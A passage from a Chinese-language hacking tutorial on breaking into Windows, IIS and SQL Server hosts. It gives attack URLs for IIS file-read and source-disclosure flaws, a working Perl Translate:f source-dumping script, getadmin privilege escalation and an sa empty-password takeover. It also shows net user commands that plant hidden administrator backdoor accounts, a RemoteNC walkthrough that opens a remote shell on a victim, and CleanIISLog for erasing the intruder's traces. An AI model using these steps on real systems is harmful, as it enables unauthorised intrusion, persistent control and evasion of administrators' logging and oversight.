登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。
F:\>copy getadmin.exe \\139.223.200.xxx\admin$
已复制 1 个文件。
F:\>copy gasys.dll \\139.223.200.xxx\admin$
已复制 1 个文件。
其次,在远程主机运行下面的命令。
C:\WINNT\system32>getadmin
如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-)
—————webhits.dll & .htw—————-
这个hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)其原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致可以查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://www.目标机.com/nosuchfile.htw
如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid
这就表示你存在这个漏洞。
这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.目标机.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。
——————-ASP Alternate Data Streams(::$DATA)—————–
$DATA这个漏洞是在1998年中期公布的,$DATA是在NTFS文件系统中存储在文件里面的main data stream属性,通过建立一个特殊格式的URL,就可能使用IIS在浏览器中访问这个data stream(数据流),这样做也就显示了文件代码中这些data stream(数据流)和任何文件所包含的数据代码。
其中这个漏洞需要下面的几个限制,一个是要显示的这个文件需要保存在NTFS文件分区(幸好为了”安全”好多服务器设置了NTFS格式),第二是文件需要被ACL设置为全局可读。而且未授权用户需要知道要查看文件名的名字,WIN NT中的IIS1.0, 2.0, 3.0和4.0都存在此问题。微软提供了一个IIS3.0和4.0的版本补丁,
要查看一些.asp文件的内容,你可以请求如下的URL:
http://www.目标机.com/default.asp::$DATA 你就得到了源代码。你要了解下NTFS文件系统中的数据流问题,你或许可以看看这文章:
http://focus.silversand.net/newsite/skill/ntfs.txt
—————-ISM.DLL 缓冲截断漏洞 —————-
这个漏洞存在于IIS4.0和5.0中,允许攻击者查看任意文件内容和源代码。通过在文件 名后面追加近230个+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLL ISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL程序把传递过来的文件打开和执行,但在ISM.DLL 截断信息之前,缓冲区发送一个断开的 .Htr 并会延迟一段时间来返回一些你要打开的文件内容。可是要注意,除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL 第一次装入内存时工作。
http://www.目标机.com/global.asa%20%20(…《=230》global.asa.htr
—————-存在的一些暴力破解威胁.htr程序 ——————
IIS4.0中包含一个严重漏洞就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个.htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
这样,攻击者可以通过暴力来猜测你的密码。如果你没有使用这个服务,请立即删除这个目录。
———————Translate:f Bug—————–
这个漏洞发布于2000年8月15号(www.securityfocus.com/bid/1578),其问题是存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中,当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS4.0上,因此在IIS4.0上也有这个漏洞,你可而已使用下面的脚本来利用这个漏洞:
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server=”$ARGV[0]”;
$s=”$server”;
$port=”80″;
$cm=”$ARGV[1]”;
&connect;
sub connect {
if ($#ARGV 《 1) {
howto();
exit;
}
$ver=”GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n”;
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die “Error: $!”;
$paddr = sockaddr_in($port, $iaddr) || die “Error: $!”;
$proto = getprotobyname(\’tcp\’) || die “Error: $!”;
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die “Error:
$!”;
connect(SOCK, $paddr) || die “Error: $!”;
send(SOCK, $ver, 0) || die “Can\’t to send packet: $!”;
open(OUT, “》$server.txt”);
print “Dumping $cm to $server.txt \n”;
while(《SOCK》) {
print OUT 《SOCK》;
}
sub howto {
print “type as follows: Trans.pl www.目标机.com codetoview.asp \n\n”;
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1); }
你可以使用下面的方法来获得源代码:
Trasn.pl www.目标机.com default.asp
———Serv-U FTP-Server v2.5b for Win9x/NT本地/远程D.o.S攻击漏洞 ————-
在Windows API 函数”SHGetPathFromIDList”中被发现存在一个缓冲区溢出漏洞。这个函数将一个项目标识符转换为一个文件的系统路径,用于处理Windows下的链接文件。
只需要一个畸形的链接文件,就可能使任何企图转换这个.lnk链接文件的程序/服务器崩溃。例如,复制一个畸形的链接文件到电脑桌面,将导致不能在该机器上登录。
要使Serv-u FTP服务器崩溃,只需上载一个畸形的链接文件到任何Serv-u的目录,然后输入FTP命令LIST,该FTP服务器将崩溃。注,基于Windows 2000的该程序没有这个问题。
漏洞检测方式参考如下:
畸形链接文件实例:http://www.ussrback.com/god.lnk
————-数据库的攻击————
对于存在”sa”空口令帐户的SQL服务器来说,最简便的入侵方法如下:
在命令行方式下键入”sqlexec [IP]”,当屏幕出现”Now type dos command(s) to execute :”时,就可以在对方的服务器上执行命令了,如下命令将创建一个新的用户帐号,并将它设置为管理员权限:
net user huodingx /add /expires:never /password:123456
net localgroup “Administrators” /add Admin
net localgroup “Users” /del huodingx
这样你就在administrators组添加了一个huodingx密码为123456的帐户。你就可以用这个帐号telnet上去。
如果,对方主机的telent服务没有开,你就接着输入net start telnet,看到成功执行命令后。对方主机已经开了telnet服务了,呵呵……不用我再说了吧!
对于mysql的root空口令,也差不多,用这个帐号可以登陆到主机的3306端口,可以添加一些程序文件到scripts文件夹,通过ie执行提升权限。
另外如果你对数据库的攻击感兴趣,可以读一下佳佳的教程(jjgirl.yeah.net)
乱七八糟的写了十几天,回头看看,也不知道写了些什么。Windows的漏洞实在是多,这里只能简单的描述一下。整天盯着屏幕,这几天眼睛老是觉的不太舒服。真是想放弃,可是又觉的对不起这几天的劳动。看来只能这样草草收场了。
第四部分
==========后门及日志=============
火丁实在是很累了,这一节也不是本文所要叙述的重点,就简单介绍一下了。
———-后门————
最简单的莫过于,添加一个用户了
net user Admin /add /expires:never /password:no
net localgroup “Administrators” /add Admin
net localgroup “Users” /del Admin
以后就可以用这个帐号登陆了,建议起用guest这个默认的,就是被发现了,大意的管理员也不会在意。
小榕那里还有一个东东remoteNC,我们来看看它的说明:
===============================================================
RemoteNC
使用说明
小榕软件试验室 版权所有
http://www.netXeyes.com http://www.netXeyes.org
Dansnow@21cn.com
——————————————————————-
Remote NC是在NT/2000中运行的一个工具,和NC类似,可以远程执行命令。和NC比较的优点在于:
1、远程安装启动,不依赖于Schedule服务。
2、可以以指定的用户身份运行,也可以以系统用户身份运行。
3、作为服务安装于远程系统,系统会自动启动。
4、快速。
D:\MyDocuments\RemoteSVC\Release>RemoteNC.exe
=======RemoteNC Beta 1, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org
Usage: RemoteNC <IP> <Username> <Password> <Starting Mode>
<Service Name> <Description Name>
<Listen Port> <Control Password> [/OVERWRITE]
<IP>: Remote Host IP Address 远程主机IP地址
<Username>: Account name in Remote Host Who Must Has
Administrators Privilege 用户名(必须具有Administrators权限)
<Password>: Password of Account Name 密码
<StartMode>: LocalSystem or RunAsUser 启动模式:LocalSystem(系统用户) RunAsUser(以前面指定的用户身份运行,推荐)
<ServiceName>: Specify Service Name 服务的名称
<Description>: Description of Service, Displayed in Service Manager 服务的说明,显示在服务管理器中,如果同名服务已经存在,将会安装失败。
<ListenPort>: Service Listen Port 启动后监听的端口
<ControlPassword>: Control Password 控制密码
[OVERWRITE]: 如果文件已经存在,则强制重写整个文件。
例子:
D:\MyDocuments\RemoteSVC\Release>RemoteNC 192.168.0.1 administrator password Runa
sUser “RemoteNC” “Provide Local CMD Redirect” 7 123456
=======RemoteNC Beta 1, Written by Assassin 2001=======
http://www.netXeyes.com http://www.netXeyes.org
[Install Service as RunasUser Mode]
Connecting 192.168.0.1 ….. Done.
Transffer File ….. Done.
Start Service ….. Done.
Now You can Tenlet 192.168.0.1 7 to Connect, Have a Joy 🙂 安装成功
D:\My Documents\RemoteSVC\Release>
D:\MyDocuments\RemoteSVC\Release>telnet 192.168.0.1 7 登录到制定的端口
RemoteNC Control Password: **************
===============Banyet Soft Labs. 1995-2001 All Rights Reserved.===============
=========Written by Assassin, Server Edition FluxShadow@21cn.com==============
Microsoft Windows 2000 [Version 5.00.2195]
RemoteNC>net user
User accounts for \\VICTIM
———————————————————————
Administrator Guest IUSR_VICTIM
IWAM_VICTIM NetShowServices TsInternetUser zjf
The command completed successfully.
RemoteNC>net user test test /add
The command completed successfully.
由于是以Administrators组的权限启动,所以不会出现1312错误。
如果是以系统权限启动,有时会出现1312错误,这就是推荐采用RunasUser安装的原因。
RemoteNC>
如果用RunAsUser模式安装失败,请用LocalSystem模式。
其实,流光自带的不少东西都是用于制作后门的,如 srv.exe等,另外,xfocus也有不少后门程序下载,自己找吧。关于后门就说这么多了。
—————日志————–
根据我的经验,大多数win的管理员,是不看日志的。别问我,我也不知道为什么。所以,呵呵,你可以放心了,只要不做大的破坏。人家是不会追查你的。如果你还是不放心可以用这个东东,呵呵……真是感谢小榕,为我们提供了这么多好的工具。这里要说的是CleanIISLog,一个win2000下擦除脚印的工具。
看一下它的readme。
===============================================
CleanIISLog ReadMe
CleanIISLog是一个清除IIS LOG记录的工具,和其他工具相比有以下不同点:
1、可以清除指定的的IP连接记录,保留其他IP记录。
2、当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog <LogFile>|<.><CleanIP>|<.>
<LogFile>: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件
(注意:处理所有日志文件需要很长的时间)。
<CleanIP>: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不
推荐这样做)。
CleanIISLog只能在本地运行,而且必须具有Administrators权限。
=============================================================
另外,要发两句牢骚,工具好,就是好,方便就是方便,有些人大谈什么技术含量不高什么的,可自己为什么不手工扫描?就象对待操作系统,一边大骂微软,可是自己的机器装的还是win。不知道为什么?
这里有一篇关于日志的文章,收在后面的附录里了,看看也许有帮助。